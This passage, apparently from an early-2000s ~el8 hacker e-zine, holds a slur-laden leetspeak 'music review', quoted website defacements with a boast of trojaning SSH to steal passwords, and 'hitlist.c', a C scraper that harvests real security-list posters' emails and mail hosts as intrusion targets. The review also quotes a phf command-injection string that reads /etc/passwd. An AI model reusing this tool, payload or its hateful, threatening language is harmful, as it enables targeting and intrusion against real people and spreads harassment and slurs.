4nd r4pp3d @ me: "y0 phuck 1cy h0t kuz theyre cheaterz... everyb0dy kn0wz cuz wez eleEeter.... 1f 1 ever s4w bl4d3 1d st4b h1m w1th a t00thp1ck, 1c3 l1v3z w1th h1z m0m & 1 h34r fl4m3z g0t a sm4ll d1ck.... 
y0 y0 aiy0 d0nt step 2 my krew, kuz 1ll fuqn k4p y0u. f00. t4p t4p ch3q." d4mn! iz all i k4n s4y, koz th3 c0c00n 1z full 0f th1s sh1t. 4ngry lyrix... th3y t4lk ab0ut st4bb1ng th3ir l4wyerz 1n c0urt, dr1nk1n 40z wh1le talkin on th4 I SEEK Y0U, buztn 0ut 0f j41l l1ke n3d k3lly, b1tch3z 1n h1gh sk00l th@ cheat 0n algebr4 t3stz, h0w much p4y1ng ch1ld supp0rt 4 a bunch 0f k1dz suxxxx, m4n 1 d0nt even want 2 sp0il th1z, itz tru-thug. pers0nally my fav0r1te tr4ckz 0f th1z cd r #2. CHEATERZ & #11. THE COURTR00M and 13. SH0W THEZE k4TZ (lab3ll3d 0n th31r webs1te az *H0T*). wh4t3v3r they d3c1d3 2 d0, r00tabega k33pz a p0s1t1v3 1m4g3. r1sh1, 4z y0ung 1nd14n b0y gr0wn up 1n th3 gh3tt0 h4d 2 s1t by and w4tch h1z y0unger br0ther wear1ng a ch1cag0 bullz jerzey get gunn3d d0wn 2 d34th by cr1pz. s331ng s0 much vi0lence in h1z d4y, & w4tch1ng h1z g00d h0meb0yz m0st8d & l00ph0le & m1ndphazr g0 2 the p3n, he m0urnz 4 th31r return & the dayz 0f tru defac3m3nt thugg3ry. 1n hiz s0ngz, he expl41nz, h0w new sk00l def4c3rz just d0nt underst4nd what 1t uz3d 2 m34n 2 the el8z, the gHerz, the 3lv3z. th1z album 1z def1n1tely a 2 thumbz up. w00w00 ------ ch3ck 1t 0ut @ http://www.w00w00.org/w00w00.mp3 w1th 0ver 30 memb3rz w0rldw1de & th1z 1z the b3st sh1t they k0uld k0me up w1th!?!?!?!? th1z 1z fuqn kr4p, 1tz even w0rse than th31r k0d3z. w0uld u listen 2 a k0p r4pp1ng? 0k damn, s0 why the phuq w0uld u l1st3n 2 a bunch 0f wh1teh@ l4m3rz pr3t3nd1ng 2 haq. 1f 1 were 1n the wu-t4ng kl4n 1 w0uld kut their n*tz 0ff, espec14lly th@ n4spt3r f4g. m1xt3r ------ 0k well th1z 1znt r34lly "thugg1sh" but 1tz undergr0und h4qr muz1k s0 uncle m4v1s dec1d3d 2 rev1ew 1t just 4 u. & th1z 1z n0 disappo1ntment e1th3r. m1xter haz sh0wn he d0eznt just kn0w h0w 2 wr1te wh1tepap3rz 4 packetst0rm, he k4n als0 wr1te s0me ph@ muz1k 2! m1xt3r d0eznt even try 2 be a thug, h3z just pure h4qr. w1th s0ng n4m3z like "/usr/bin/strings" and "1ntrusi0n det3kt3d" and "/cgi-bin/phf?Qalias=%0acat%20/etc/passwd." 
1 def1n1tely w0uld n0t rec0mmend th1z 4 l1st3n1ng 2 pe0ple outs1d3 0f the 'sc3n3' becuz it iz 1nf0rmation 0verl0ad! but 4 th0ze 0f u wh0 th1nk u h4v3 wh4t 1t t4k3z 2 dec1ph3r hiz kryptik msgz, u k4n f1nd h1z muzik @ http://www.mp3.com/mixter/ th3z3 s0ngs rem1nd me a l0t 0f th1z 0ne t1me 1 s4w th3z3 2 austrian d00dz french k1ss1ng each0ther in an 'E wild 0n 1b1z4.' but enuf of th@ /usr/bin/strings s0undz a bit retro, with s0me atar1 l1ke s0undz 2 rem1nd u of exactly h0w 0ld sk00l m1xter really is, & synthlinez th@ w0uld bl0w depeche m0de 0ut 0f the w4t3r. m1xt3r, as he l1k3z 2 r3f3r 2 himself az 'DJ MIXY' 2 th3 r3st 0f the w0rld 0fferz h1z serv1c3z 2 th3 c0mmun1ty by dj'ing in s4f3 drug phr33 b4r m1tvahz in t3l av1v, where h1z t0pn0tch internet sekur1ty k0mpany w1th phell0w h4ck1ng st4rz ANALYZER and IZIK of hwa-security/d4rkn3t 1z l0c8d. s0met1m3z when he iz juzt "chiln 0ut" he k4n be f0und d4nc1ng @ w1ld r4v3z @ the g4z4 str1p w1th h1z p4t3nt3d redwhite'nblue gl0wst1ckz & vickz inh4l3r. but h3 d03z m0st 0f h1z w0rk 4 fr33, s1nc3 az m4ny grey/bl4ckhatz he shunz the c0mmercializ4t10n 0f s0phtjuarez & releasez hiz trax under GPL! he als0 h0pez th@ 0ne day s0meb0dy w1ll B insp1r3d by h1z s0ngz 2 0wn a univers1ty netw0rk w1th m1cr0s0ft w1nd0wz src k0de & d0n8 the ph1nd1ngz 2 him! ~el8 4tt3mpt3d 2 k0nt4kt mixter 4 an 1nterv1ew ab0ut h1z muz1k but he angrily d3kl1n3d, s4y1ng he w0uld never 't4lk 2 u squinty 3y3d m0th3rphuckrz' as l0ng 4s 'th3 br34th 0f l1fe fu3l3d h1z b0dy.' h3 th3n ch4ll3ng3d uncle m4v1s 2 "get my passw0rd ph1le again" s1nce h1z b0x d0eznt all0w 0utg01ng em41lz 2 j4p4n anym0r3. th1z wuz unfphortun8 but 4 the s4ke 0f 0bjekt1v1ty uncle m4v1s g1vez thiz album a "p0sitive" rev1ew. y0 well th@z all the muz1k 1 k0uld find 4 n0w! r3m3mb3r 2 k33p 1t r34l peace 0ut d/-\wGz. .~e~----------------------------------------------------------~e~. 
; *06* defacements of the milenium -- ~el8 ; `----------------------------------------------------------------' -----------------------. anti.security.is owned 0 ~~~ :PpPPppPPPp -----------------------' turkey Oh, life it's bigger, it's bigger than you and you are not me The lengths that I will go to, the distance in your eyes WE ARE THE HACKERS WHO ACTUALLY HACK. UNLIKE OTHER "HACKERS," WE DON'T SIT ON OUR WAREZ. ACTION SPEAKS LOUDER THAN SILLY WORDS. GOBBLES IS ABOUT GETTING THINGS DONE. THANKS TO THE POP PSYCHOLOGISTS ON THE ANTISEC MESSAGE BOARD. YOUR COMBINED PSYCHOANALYSIS MISSED UNCONTROLLABLE URGES TO DEFACE SECURITY WEBSITES THOUGH! 2002 IS YEAR OF TURKEY. MAKE NO MISTAKE ABOUT THIS. AND THERE'S NOTHING ANYONE CAN DO... THIS HACK MADE POSSIBLE WITH BITCHX REMOTE EXPLOIT AGAINST JIMJONES HOME COMPUTER THEN TROJANING HE SSH TO COLLECT PASSWORDS... ------------------------. udp's livejournal owned 0 ~~~ :PpPPppPPPp ------------------------' [2041] udp the lame phrack whore's LiveJournal [Most Recent Entries] [Calendar View] [Friends] Below are the 20 most recent journal entries recorded in udp the lame phrack whore's LiveJournal: [ << Previous 20 ] Monday, December 31st, 2001 12:42 pm Been rereading Leisure Town and laughing my ass off. (Comment on this) 11:38 am owned in the 2002 yo chek it, im fat & owned keep it re4l libnetx25 el8.8m.com watch your back we out (Comment on this) Sunday, December 30th, 2001 4:12 pm Add Hope Sandoval to the list from the 25th. Fantastic. :) Current Music: Mazzy Star - Wild Horses(2 Comments |Comment on this) 1:38 pm mmm. the big chill. you must get this track. Current Mood: chillllled Current Music: Mescalito - Shoreditch Oyster(Comment on this) 1:23 pm Desi-derata. Current Mood: caffeinating Current Music: Mescalito - Dark Corner Light(Comment on this) Saturday, December 29th, 2001 10:10 pm hrm. looking at wmglobe, again, it seems most of the populated human world is in darkness right now. whack. 
the sun's shining high above the pacific; the pacific's enormous. Current Music: Veruca Salt - Bodies(Comment on this) 3:14 pm Obviously CURRENT doesn't like my dirty hack of hijacking the IPPROTO_RSVP pointer in ip_protosw[]. (Comment on this) 3:09 pm the sun is out. free of its grey bonds finally. eclectic love washing over the city. (Comment on this) 2:57 pm Bah! I just loaded my driver into -CURRENT - BOOM! Works fine on -STABLE though. Oh well, hacking time... (Comment on this) 11:47 am Protected A rare sighting *o* mudge [~mudge@0nus.l0pht.com] has joined #cdc *o* irc.carrier1.net.uk Saturday December 29 2001 -- 11:44:25 +00:00 Hm! Just as I was about to head out for lunch, too... (Comment on this) 11:43 am Musings on zen and singing. An overcast day in London today. Dull grey cloud settled over the city like white taffy, hydrogenated, a smooth constriction. I rise, wash, put my boots on and make coffee. I feel the cool air rise against my damp, freshly depilated skin. The thermostat clicks as the heater switches off, the aesthetic of warmth lost on the machine, for it is thus. I run my hand over my forehead, and around my fringe. I smile, knowing what it is to live in the moment, and that though our best laid plans and fondest dreams may never come to fruition, living in the moment is that which is most important. After a spate of not being able to sleep well, I suddenly find myself enjoying the most pleasant, restful night's sleep, and this has been the case some three nights in a row now. Last night my final thought before leaving wakefulness was this: how does Kate Bush feel about her success and her life? I wonder if she has always wanted to be where she has gotten to. I think one could well ask these questions of any successful person. Is it atypical to be blown off one's original course, and yet still discover one's own New World? Or is it an occupational hazard? When hungry, eat. When tired, sleep. 
(Comment on this) 12:25 am There are some screen grabs of my desktop from today here. (3 Comments |Comment on this) Thursday, December 27th, 2001 1:26 pm Ok. I submitted 7 new FreeBSD ports inside 12 hours. Can I have a biscuit? (2 Comments |Comment on this) 7:24 am Submitted FreeBSD port for x11-fonts/gfe (GNU Font Editor 0.0.4). (Comment on this) Wednesday, December 26th, 2001 10:05 pm Without memories, a race has no future. (3 Comments |Comment on this) Tuesday, December 25th, 2001 1:20 pm A quiet day of fond restitude, for the weary traveller. Mmmm. Having a very chilled out Yule; curling up with some Baileys and wotnot, listening to music and reading books. What a holiday should be at this time of year, I think. A time to nurture dreams anew and sow amongst the furrows of the psyche. Been on a different tack with mp3 playlists lately, need female vocalists to pace out all this D'n'B, industrial, trance... so this manifests itself in the form of Tori Amos, Paula Cole, Beth Orton, Alison Moyet, Louise Post (of Veruca Salt fame), Sarah McLachlan, and of course, Kate Bush. As for the delectable Ms Bush, she will hopefully have an album out during 2002, which I am looking forward to with anticipation. I still hold Wuthering Heights to be one of her best tracks of all time... In the meantime, you might like to check out Paula Cole's work. She teamed up with Peter Gabriel on his Secret World Tour in 1993, and you can hear her passion, and diverse vocal range, on tracks such as Talk To Me and Hush Hush Hush. Those of you who are fans of Peter Gabriel also will clock that Peter's last longstanding female vocal partner was... stand up, Kate Bush! As a longstanding fan of Peter's work I have to say I admire his knack for working with the female voice. 
He confessed that it was a skill he acquired over many years, in an interview on ITV (1993, UK); indeed much of his work from the late 1970s, after he split from Genesis, took on more of a masculine edge than what one experiences from his albums So (1986) and Us (1992); the latter was produced by the brilliant Daniel Lanois, featured on U2's superb Achtung Baby (1990). Paula, however, reveals a much flirtier side to her work, in a song from the motion picture soundtrack for the Wim Wenders film City of Angels, a track entitled Feelin' Love. As you can see from the lyric sheet, it's quite candid, but you really have to hear her singing this; she manages to come across as sensual without being kitsch or trashy. It's a departure from her other tracks, lest we begin to think the adorable Miss Cole is a goody two-shoes. I can't really put into words how enthused I am by her talent. Her voice helps to create a fertile creative space for me; it's only over the past two years or so that I've begun to realize how essential the immediate environment is to the creative act, be that making music, writing code, sculpting; or any other form of play. Isolation alone is not the way to get the job done; often it's good to invite a bunch of friends over, share the Baileys or Jasmine tea or whatever the tipple is, and then return to one's work, having given the machine-mind a rest and returned to social consciousness, if only for a few hours. My plans for 1Q 2002 are still being worked on; I also need to decide what to do this upcoming summer. I'm open to suggestions for places to visit, hang out, have a good time. And like that rubberband girl in the red shoes, I bounce back on my feet. Fond greetings to friends present and past, in whatever mode you choose to celebrate the Solstice; I wish you all well. Current Mood: pleasantly inert Current Music: Kate Bush - Rubberband Girl(1 Comment |Comment on this) Thursday, November 29th, 2001 2:16 pm Just woke up. Urrrrrrrrgggggh. 
Upgraded the -CURRENT box late last night - the change alone from a Realtek to an Intel FXP makes a *massive* difference. FreeBSD now supports every single bit of hardware in the box. Matt Dillon gave an interview very recently where he cites the current SMPng work and the OpenGL support as the main hurdles to be overcome for FreeBSD at the moment. I agree - once OpenGL support is in place, I will have very little reason to run Windows, or even Linux, for that matter, ever again. One exception is IrDA support, but I might choose to port that anyway. Anyway. I'm eating a pot rice at the moment, deferring real food until we (people are here) decide what we're going to do. *stretches* (Comment on this) Wednesday, November 28th, 2001 11:11 am Is it any wonder I can't sleep? (apologies to Smashing Pumpkins) Woke up at 10pm last night, my sleeping pattern is TOTALLY shafted... it's out of control, and the kids just love it! (props to KMFDM...) As of this morning I've written FreeBSD ports entries for Dug Song's libdnet, a portable packet generation and low-level networking API, and Tony Curtis's wots, which is an extremely cool system log monitoring program written in Perl. I've been using wots for literally years now. Rock on. Hopefully other people will find them useful. qtop is working spankingly for my droptail queues on the WaveLAN gateway, but I need to clean up the code, fix it to work with RED/wRED dispatcher, and get it committed to FreeBSD-CURRENT. Current Music: Technical Itch - Deadline(Comment on this) Monday, November 26th, 2001 9:25 am Access granted. I've just written and released a tool to perform real-time monitoring of the FreeBSD Bandwidth Shaper, as part of the Consume Project. It's essential that we be able to throttle bandwidth on a per-node basis to prevent wired links to the mobile cloud becoming saturated. This tool will help us to configure the bandwidth shaper at each node. 
Getting the hang of the masking for the packet flow sets is quite tricky; this will help the community networking effort by allowing people to experiment with bandwidth throttling and getting visual (as well as anecdotal) feedback on the effect of their configuration changes. You MUST get the track I'm listening to. At the moment I'm pretty frazzled on caffeine having been awake for most of the weekend and Friday, and have the heating turned down to keep me frosty. Oh yeah. What else is cool. ParMaster hung with us at the weekend. Current Mood: accomplished Current Music: Apoptygma Berzerk - Kathy's Song (Ferry Corsten Remix)(1 Comment |Comment on this) Monday, November 19th, 2001 3:06 am ick, writing parsers is such a chore. (Comment on this) [ << Previous 20 ] My Website About LiveJournal.com .~e~----------------------------------------------------------~e~. ; *07* ~el8 hitlist tools -- uncle m4v1s ; `----------------------------------------------------------------' ~el8 ~el8 has has generated generated hitlists hitlists for for every every security security related related mailing mailing list list known 4r3z known to urfukd to mankind mankind h3re y0u g0 d00dz, str8 fr0m the ~el8 w4r3z gr4bb4g. th1s t00l w1ll h3lp 0ur f0ll0w3rz by cre4t1ng h1tl1sts of emails/systems that p0st t0 vari0uz security f0cus mailing lists. 
~el8 ADVISORY STYLE S0LLUTI0N: d0nt p0st t0 th3z3 mail1ng lizts ex4mple 0utput: $ ./hitlist 1 LAMER: sh0@libertynet.de (sh0) LAMER BOX: cybersilo.lnx LAMER: tsmith@zonelabs.com (Te Smith) LAMER BOX: mail.securityfocus.com LAMER: merchantjosh@qwest.net (Joshua Merchant) LAMER: draht@suse.de (Roman Drahtmueller) LAMER BOX: dent.suse.de LAMER: secnotif@microsoft.com (Microsoft Product Security) LAMER: newsflash@macromedia.com (Macromedia Security Alert) LAMER BOX: rsigate.macromedia.com LAMER: joacim@axis.com (Joacim Tullberg) LAMER BOX: mail.securityfocus.com LAMER: tluce@pti-pump.com (Timothy Luce) LAMER BOX: PTIPump.com LAMER: support_feedback@us-support.external.hp.com (IT Resource) LAMER: wichert@wiggy.net (Wichert Akkerman) LAMER BOX: wiggy.net LAMER: raistlin@gioco.net (Raistlin) LAMER: cadence@apollo.aci.com.pl (Tomasz Grabowski) LAMER: dotslash@snosoft.com (KF) LAMER BOX: snosoft.com LAMER: flatline@blackhat.nl (flatline) LAMER BOX: mail.werkopmaat.nl LAMER: adonis1@videotron.ca (Adonis.No.Spam) LAMER BOX: videotron.ca LAMER: gobbles@hushmail.com LAMER BOX: mailserver1.hushmail.com LAMER: seclsts@fast.net (Rich Henning) LAMER BOX: fast.net LAMER: alexm@pycckue.org (alex medvedev) LAMER: pr0ix@def-con.org (pr0ix) [CUT_HERE] hitlist.c /* * l4m3r l1zt3r v1.0 by uncle m4v1s * th1z 1z a s1mple t00l th@ ~el8 haz been uzing 4 several ye4rz, * ever s1nce pr0ject m4yh3m wuz 1st st4rt3d. * 1tz a 1-use t00l, juzt run th1z on any 0ne of the k-l4m3 * s1tez upd8d by secur1tyf0cus.com on the1r ml-p0rtal, & * u n0w h4ve a l1zt 0f ret4rdz 2 hack and st34l "0day" from. * th1zt skr1pt g0ez back s3v3ral ye4rz s0 u get the ch4nc3 2 * ch3ck 0ut r34l b0xez th@ were uz3d be4 the gr34t p4n-l4m3r * 3ff0rt 2 get sc3n3 sh3llz 2 h1de the1r 1dent1t3z. 
* by t4rg3tt1ng p0stz by p0l1te sekur1ty pr0fess10nalz & * 0wn1ng the1r `sh1t` and r4v4g1ng th3 kn0wn_h0stz 0n the ab0ve * b0x3z, we n0t1c3d the subtl3 c0rrel4t10n betw33n m4n & myth, * 4nd st4rt3d 2 rek0gn1z3 the k0rrel4t10n betw33n REAL PEOPLE & * the 0nl1ne 1dent1t3z they assum3d. 4 example, 0wn 4ll russ14n * bugtraq p0st3rz s1nce 1997 and u w1ll n0t1c3 4t l34zt 0ne 0f * th3m l0gg1ng 1nt0 z0l0.fr33lsd.n3t/c4nn4b1z.dataf0rce.net (hi str!) * 4nyh0w, 4z rule #2 of pr0jekt m4yh3m g0ez, if u c4nt st34l w4r3z * 0r sn1ff, rm the fukrz! * h4ppy hunt1ng */ #include #include #include #include #include #include #include #include #include #include #define PREFIX "GET http://online.securityfocus.com" #define BASE_CMD "GET http://online.securityfocus.com/archive/1" struct sockaddr_in sinz; struct target{ char *lamercode; char *url; } targets[] = { {"ARIS USERZ","GET http://online.securityfocus.com/archive/114"}, {"bugtraq[lol]","GET http://online.securityfocus.com/archive/1"}, {"bugtraq-es (bugtraq in spain jajaja)", "GET http://online.securityfocus.com/archive/80"}, {"bugtraq-jp & shadowpenguin friendz", "GET http://online.securityfocus.com/archive/79"}, {"cisspstudy [inspired by dr. 
crispin cowin]", "GET http://online.securityfocus.com/archive/99"}, {"focus-ids [cant sekure a b0x so they use ids]", "GET http://online.securityfocus.com/archive/96"}, {"choose this if u have linux 0day", "GET http://online.securityfocus.com/archive/91"}, {"choose this if u have win32 0day", "GET http://online.securityfocus.com/archive/88"}, {"choose this if u have solaris 0day", "GET http://online.securityfocus.com/archive/92"}, {"scan here for bo2k", "GET http://online.securityfocus.com/archive/100"}, {"forensics (prolly not worth it, they r already 0wned)", "GET http://online.securityfocus.com/archive/104"}, {"honeynet [leave burneye encrypted kopiez" " of nmap 4 lance sp1tzner here]", "GET http://online.securityfocus.com/archive/119"}, {"incidents [see how well pr0ject m4yh3m is d0ing", "GET http://online.securityfocus.com/archive/75"}, {"pen-test [people like s1 here hehe]", "GET http://online.securityfocus.com/archive/101"}, {"sec-papers [4 the literary inkl1n3d like warzael zarcae", "GET http://online.securityfocus.com/archive/112"}, {"security-basics PAHAHAHAHAHA n3wb13z ripe 4 the picking", "GET http://online.securityfocus.com/archive/105"}, {"security-certification [l4m3rz who have subskr1b3d" " 2 security-basics longer than 2 weekz", "GET http://online.securityfocus.com/archive/106"}, { "security-jobs [own theze fuckerz quick, they r desperately" " trying 2 publish 0day]" ,"GET http://online.securityfocus.com/archive/77"}, {"vpn [hehe launch pptphack here]", "GET http://online.securityfocus.com/archive/50"}, {"vuln-dev <- th3 m0ther l4m3r sh1p h4z l4nd3d", "GET http://online.securityfocus.com/archive/82"}, {"choose this if u have shopping kart cgi po1z0n byte warez", "GET http://online.securityfocus.com/archive/107"} }; void printdates(char *url) { char *ptr; int bday,bmonth,byear,eday,emonth,eyear,num; #define MAGIC "/archive/1/" ptr=strstr(url,MAGIC); if(ptr==NULL) return; num=sscanf(url, "/archive/1/%d-%d-%d/%d-%d-%d/" 
,&byear,&bmonth,&bday,&eyear,&emonth,&eday); printf("LAMER CHRONOLOGY: "); if(num!=6) printf("ERROR IN PARSING BUT WH0 KAREZ\n"); else printf ("%d/%d/%d to %d/%d/%d\n", bmonth,bday,byear,emonth,eday,eyear); fflush(stdout); } char *makeurl(char *end) { char *r; int size=strlen(PREFIX)+strlen(end)+4; r=malloc(size); if(r==NULL){ fprintf(stderr,"hmm out 0f memory... might be 4 f0rq b0mb!\n"); system("ps -u cr"); exit(-1); } memset(r,0,size); strcpy(r,PREFIX); if(*end!='/') strcat(r,"/"); strcat(r,end); strcat(r,"\r\n"); return r; } void sendcmd(int fd,char *cmd) { write(fd,cmd,strlen(cmd)); write(fd,"\r\n\r\n",2); } int connecthost(void) { int fd; fd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if(fd<0){ fprintf(stderr,"out of socketz... weird\n"); system("ps aux|egrep tron|mixter|felix"); exit(-1); } if(connect(fd,(struct sockaddr*)&sinz,sizeof(sinz))<0){ fprintf(stderr, "cant connect to online.securityfocus.com...project mayhem successfully accomplished!\n"); exit(-1); } return fd; } /*f-fgetz*/ char* readline(int fd) { static char buf[8192]; char yo; int i = 0; memset(buf,0,sizeof(buf)); for(i=0;iMessage-ID:<"); if(ptr==NULL) goto checkauthor; ptr+=13; ptr=strchr(ptr,'>'); if(ptr==NULL) goto checkauthor; ptr++; ptr=strchr(ptr,'>'); if(ptr==NULL) goto checkauthor; while(*ptr&&*ptr!='@') ptr++; if(!*ptr) goto checkauthor; ptr++; startbox=ptr; while(*ptr&&(isalnum(*ptr)||*ptr=='.')) ptr++; if(!*ptr) goto checkauthor; *ptr=0; /*s4n1tych3ck*/ if(strchr(startbox,'.')==NULL) goto heh; printf("\t\tLAMER BOX: %s\n",startbox); goto heh; checkauthor: ptr=strstr(l,">Author:<"); if(ptr==NULL) goto heh; ptr+=10; ptr=strstr(ptr,"mailto:"); if(ptr==NULL) goto heh; ptr+=7; startemail=ptr; ptr=strchr(ptr,'"'); if(ptr==NULL) goto heh; *ptr++=0; ptr=strchr(ptr,'>'); if(ptr==NULL) goto heh; startname=++ptr; ptr=strchr(ptr,'<'); if(ptr==NULL) goto heh; *ptr=0; printf("\tLAMER: %s",startemail); if(strlen(startname)) printf(" (%s)",startname); printf("\n"); fflush(stdout); heh: 
l=readline(fd); } close(fd); } /*cykle thru ind3z p4g3z*/ char *letitrip(int fd) { char *l=readline(fd); char *ptr,*start=NULL,*nexturl=NULL,*lamerpost; while(l!=NULL){ /*YO*///printf("line = %s\n",l); /*try p0stz first*/ #define SEKRETKEY "
'); if(ptr==NULL) goto heh; ptr++; if(strstr(ptr,"prev Week")==NULL) goto heh; /*w0rd here iz the previ0uz week*/ if(nexturl==NULL) nexturl=strdup(start); heh: l=readline(fd); } return nexturl; } int main (int argc,char **argv) { struct hostent *he; int fd; char *newurl,*startpoint; if((argc>2)||((argc==2)&&(!strcmp(argv[1],"-h")))){ int i; fprintf(stderr, "l4m3rl1zt3r usage: %s <#>\nwhere # is a l4m3r k4t3g0ry, defaultz 2 bugtraq\n\n",argv[0]); fprintf(stderr,"l4m3r k4t3g0r1ez:\n"); fprintf(stderr,"-----------------\n"); for(i=0;i=(sizeof(targets)/sizeof(struct target))){ fprintf(stderr,"s0rry kouldnt find specif1ed l4m3r...\n"); fprintf(stderr, "there r many more lam3rz, ~el8 iz working ar0und" " the cl0q 2 upd8 thiz program with the necessary 2385915 entriez.\n"); fprintf(stderr,"try a valid # tho\n"); exit(-1); } startpoint=targets[choice].url; } else startpoint=BASE_CMD; fprintf(stderr,"l4m3rl1zt3r v1.0\n"); fprintf(stderr,"by uncle m4v1s\n"); fprintf(stderr,"k0pyright (K) 2002 ~el8 research labz\n"); fprintf(stderr,"for help, try -h\n\n"); he = gethostbyname("online.securityfocus.com"); if(he==NULL){ fprintf(stderr,"cant resolve online." 
"securityfocus.com...project mayhem successfully accomplished!\n"); exit(-1); } memset(&sinz,0,sizeof(sinz)); sinz.sin_family=AF_INET; sinz.sin_port = htons(80); memcpy(&sinz.sin_addr,he->h_addr,4); fprintf(stderr,"acquiring t4rget l1zt...!\n"); fprintf(stderr,"begin l4m3r l1st tr4nsm1ss10n!\n"); printf("------------------------------\n"); fd=connecthost(); sendcmd(fd,startpoint); printf("LAMER CHRONOLOGY: CURRENT\n"); fflush(stdout); newurl=letitrip(fd); close(fd); if(newurl==NULL){ fprintf(stderr,"weird..some un3xpekt3d sh1t happened!\n"); exit(-1); } while(newurl!=NULL) { char*req; fd=connecthost(); req=makeurl(newurl); sendcmd(fd,req); printdates(newurl); free(newurl); free(req); newurl=letitrip(fd); close(fd); } printf("-------------------------------------\n"); fprintf(stderr,"we h4v3 d3t3kt3d 4ll p0ss1bl3 l4m3rz!\n"); fprintf(stderr,"n0thing l3ft 2 d0..m4ybe ch3ck #!el8.\n"); fprintf(stderr,"-------------------------------------\n"); return 0; } [END_CUT] hitlist.c .~e~----------------------------------------------------------~e~. ; *08*